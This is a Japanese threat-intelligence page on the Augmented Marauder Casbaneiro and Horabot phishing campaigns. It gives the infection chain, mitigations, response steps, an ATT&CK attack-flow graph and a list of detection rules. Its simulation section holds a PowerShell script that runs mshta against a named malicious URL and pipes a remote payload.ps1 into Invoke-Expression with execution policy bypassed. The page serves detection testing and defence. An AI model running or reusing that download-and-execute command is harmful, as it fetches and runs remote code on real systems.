フォローする 
調査
研究者たちは、最初の添付ファイルから最終ペイロードの実行までのエンドツーエンドのチェーンを再構築しました。彼らは、mshta.exeをトリガーするHTAステージを分析し、それに続いて2段階のJavaScript/VBScriptローダーと、ハードコードされたシード値でAES暗号化されたコンテナを復号化するために使用されるAutoITコンポーネントを確認しました。静的解析により、HorbotとCasbaneiroのバイナリの存在と、サンドボックスのユーザー名やVM関連のアーティファクトを確認するアンチ解析ロジックが確認されました。ネットワークの観察では、Cloudflare保護されたドメインと、配信フェーズ中に被害者ごとに動的なPDFを生成するために使用されるPHP APIによってフロントされたC2インフラストラクチャが示されました。
緩和策
信頼できないコンテンツに対してmshta.exeの実行をブロックまたは厳密に管理し、ZIP/HTA/スクリプトベースのチェーンに対する添付ファイルの検査を強化します。OutlookのCOMオブジェクトと相互作用する異常なPowerShellの動作を監視し、これはメールボックス駆動の伝播を示します。ネットワーク層では、特定された悪意のあるドメインとIPアドレスをブロックまたは警告し、ステージングに使用されたPDF生成サービスへのアクセスを制限するためにURLフィルタリングを適用します。アプリケーションの許可リストを使用して、明示的な承認なしにAutoITインタープリタの実行を防ぎます。
対応策
活動が検出された場合、エンドポイントを隔離し、疑わしいmshta.exeやPowerShellプロセスを停止し、公のディレクトリにドロップされたファイルを特に取り除きます。HTA、VBS、AutoITステージをフォレンジックレビューのために収集し、影響を受けたホスト全体でstaticdata.dllとat.dllを探します。危殆化されたメールアカウントの資格情報をリセットし、悪意のあるOutlookのCOM自動化やルールを無効化し、抽出されたIOCで検出コンテンツを更新し、横展開やハイジャックされたインボックスからの後続のフィッシングを監視します。
キーワード: Augmented Marauder, Water Saci, Casbaneiro, Horbot, 南米, スペイン語フィッシング, WhatsApp誘導, ClickFix, HTA, mshta.exe, VBScript, JavaScriptローダー, AutoIT, PowerShell, Outlook COM, AES復号化, UUID ZIP, パスワード保護されたPDF, Cloudflare C2, PHP API, バンキングトロイの木馬, メールアカウント乗っ取り。
"graph TB %% クラス定義 classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#e6e6e6 classDef process fill:#ffdd99 classDef malware fill:#ff9999 classDef persistence fill:#ccffcc classDef c2 fill:#ffcc99 classDef operator fill:#ff9900 %% ノード定義 action_phish_attach["<b>アクション</b> – <b>T1566.001 フィッシング: スピアフィッシング・アタッチメント</b><br/>パスワード保護されたPDFによる悪意のあるメールで司法召喚状として偽装"] class action_phish_attach action action_phish_link["<b>アクション</b> – <b>T1566.002 フィッシング: スピアフィッシング・リンク</b><br/>PDF内のリンクがランダムなUUID名のZIPファイルを自動ダウンロード"] class action_phish_link action file_zip["<b>ファイル</b> – ZIPアーカイブ<br/>HTAファイルを含む"] class file_zip file file_hta["<b>ファイル</b> – HTAファイル<br/>mshta.exeを介して実行される"] class file_hta file process_mshta["<b>プロセス</b> – mshta.exe<br/>JavaScriptをロードし、2段階目のVBScriptを取得"] class process_mshta process script_vb["<b>アクション</b> – <b>T1059.005 コマンドおよびスクリプトインタープリタ: Visual Basic</b><br/>サンドボックスチェックとペイロードダウンロード"] class script_vb malware action_sandbox_evasion["<b>アクション</b> – <b>T1497.002 仮想化/サンドボックス回避</b><br/>ユーザーアクティビティベースのサンドボックスユーザー名およびVMアーティファクトチェック"] class action_sandbox_evasion action action_deobfuscation["<b>アクション</b> – <b>T1140 ファイルまたは情報の難読化解除/デコード</b><br/>ランタイムでの文字列とコードの難読化解除"] class action_deobfuscation action script_powershell["<b>アクション</b> – <b>T1059.001 コマンドおよびスクリプトインタープリタ: PowerShell</b><br/>AutoITインタープリタをダウンロードし、Outlookの連絡先を収集"] class script_powershell malware tool_outlook["<b>ツール</b> – Outlook COMオブジェクト<br/>メール伝播のためにアドレス帳をスクレイピング"] class tool_outlook tool tool_autoit["<b>ツール</b> – AutoIT<br/>コンパイルされたスクリプトで暗号化されたペイロードを生成"] class tool_autoit tool action_compile["<b>アクション</b> – <b>T1027.004難読化されたファイルまたは情報: 配信後にコンパイル</b><br/>ホスト上でのペイロードのコンパイル後に実行"] class action_compile action malware_dll["<b>マルウェア</b> – 暗号化されたDLLs (staticdata.dll, at.dll)"] class malware_dll malware process_reflect_load["<b>プロセス</b> – 反射DLL読み込み<br/>ディスクに書き込むことなくメモリに直接DLLを読み込む"] class process_reflect_load process action_injection["<b>アクション</b> – <b>T1055.001 プロセスインジェクション: DLLインジェクション</b><br/>反射的に読み込まれたDLLをプロセスに注入"] class action_injection action persistence_shortcut["<b>持続性</b> – <b>T1547.009 ショートカット改変</b><br/>スタートアップフォルダにLNK配置"] class persistence_shortcut persistence c2_communication["<b>C2</b> – <b>T1102 Webサービス</b><br/>Cloudflare保護されたドメインを経由したHTTP GET/POST"] class c2_communication c2 tool_turo["<b>ツール</b> – Turo.exe (AutoITコンパイル済み)"] class tool_turo tool tool_tekojac["<b>ツール</b> – Tekojac.exe (Auto2Exe)"] class tool_tekojac tool action_masquerade["<b>操作</b> – <b>T1036.008 偽装</b><br/>PDFとZIPファイルが正規のものに見える"] class action_masquerade action %% コネクション action_phish_attach –>|配送| file_zip file_zip –>|含む| file_hta file_hta –>|によって実行される| process_mshta process_mshta –>|ロードする| script_vb script_vb –>|実行する| action_sandbox_evasion action_sandbox_evasion –>|誘導する| action_deobfuscation action_deobfuscation –>|明らかにする| script_powershell script_powershell –>|使用する| tool_outlook script_powershell –>|ダウンロード| tool_autoit tool_autoit –>|生成する| action_compile action_compile –>|作成する| malware_dll malware_dll –>|ロードされる| process_reflect_load process_reflect_load –>|可能にする| action_injection action_injection –>|に注入する| process_mshta action_injection –>|可能にする| persistence_shortcut persistence_shortcut –>|維持する| c2_communication script_powershell –>|ダウンロード| tool_turo script_powershell –>|ダウンロード| tool_tekojac action_masquerade –>|隠す| action_phish_attach action_masquerade –>|隠す| action_phish_link %% スタイル class action_phish_attach action class action_phish_link action class file_zip file class file_hta file class process_mshta process class script_vb malware class action_sandbox_evasion action class action_deobfuscation action class script_powershell malware class tool_outlook tool class tool_autoit tool class action_compile action class malware_dll malware class process_reflect_load process class action_injection action class persistence_shortcut persistence class c2_communication c2 class tool_turo tool class tool_tekojac tool class action_masquerade action "
攻撃フロー
検出
パブリックユーザープロファイル内の不審なファイル (ファイルイベント経由)
表示
不審なPowerShell文字列 (powershell経由)
表示
公衆ユーザープロファイルからの不審な実行 (プロセス生成経由)
表示
PowerShellからの不審な.NETメソッドの呼び出し (powershell経由)
表示
LOLBAS WScript / CScript (プロセス生成経由)
表示
HTAファイルなしの不審なMshta実行 (cmdline経由)
表示
IOCs (HashSha256) 検出対象: Augmented Marauderの多数のCasbaneiroキャンペーンの解析
表示
IOCs (SourceIP) 検出対象: Augmented Marauderの多数のCasbaneiroキャンペーンの解析
表示
IOCs (DestinationIP) 検出対象: Augmented Marauderの多数のCasbaneiroキャンペーンの解析
表示
フィッシングキャンペーンのための悪意のあるPowerShellおよびMAPI使用の検出 [Windows PowerShell]
表示
Augmented Marauder Casbaneiroキャンペーンの検出 [Windowsネットワーク接続]
表示
HorabotキャンペーンにおけるMshtaとPowerShell実行の検出 [Windowsプロセス生成]
表示
シミュレーション実行
前提条件: テレメトリーおよびベースラインの準備チェックが合格している必要があります。
根拠: このセクションでは、検出ルールをトリガーするために設計された敵の技術 (TTP) の正確な実行を詳細に説明します。コマンドおよびストーリーは、特定されたTTPsを直接反映する必要があり、検出ロジックによって予想されるテレメトリーを正確に生成することを目指します。抽象的または無関係な例は誤診を引き起こします。
-
攻撃の詳細 & コマンド:
脅威アクターは、被害者のワークステーションで足場を築くことを目的として Mshta を使用して、悪意のあるHTAペイロードをダウンロードし実行しhttps://ge.factu.it.com/GZSPEGIJ/YFSBNPQKにホストされています。直後に、アクターは PowerShell を使用して同じドメインからの第2段階スクリプトをダウンロードしInvoke‑WebRequest経由で、メモリ内で実行します。両方のバイナリは、監査ログの可能性を高めるために昇格されたコマンドプロンプトから起動されます。 -
回帰テストスクリプト:
# Horabotシミュレーション – 同じセッションでmshtaとPowerShellをトリガー # 1. Mshtaを悪意のあるURLで起動 $htaUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK" Start-Process -FilePath "$env:SystemRootsystem32mshta.exe" -ArgumentList $htaUrl -WindowStyle Hidden # 2. リモートスクリプトをダウンロードして実行するためにPowerShellを起動 $psUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK/payload.ps1" Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" ` -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Invoke-WebRequest -Uri '$psUrl' -UseBasicParsing | Invoke-Expression`"" ` -WindowStyle Hidden -
クリーンアップコマンド:
# 残存する可能性のある悪意のあるプロセスを終了する(生き残った場合) Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Stop-Process -Force # ドロップされた可能性のあるファイルを削除(例示的な場所) $paths = @( "$env:TEMPpayload.ps1", "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.hta" ) foreach ($p in $paths) { if (Test-Path $p) { Remove-Item -Path $p -Force } }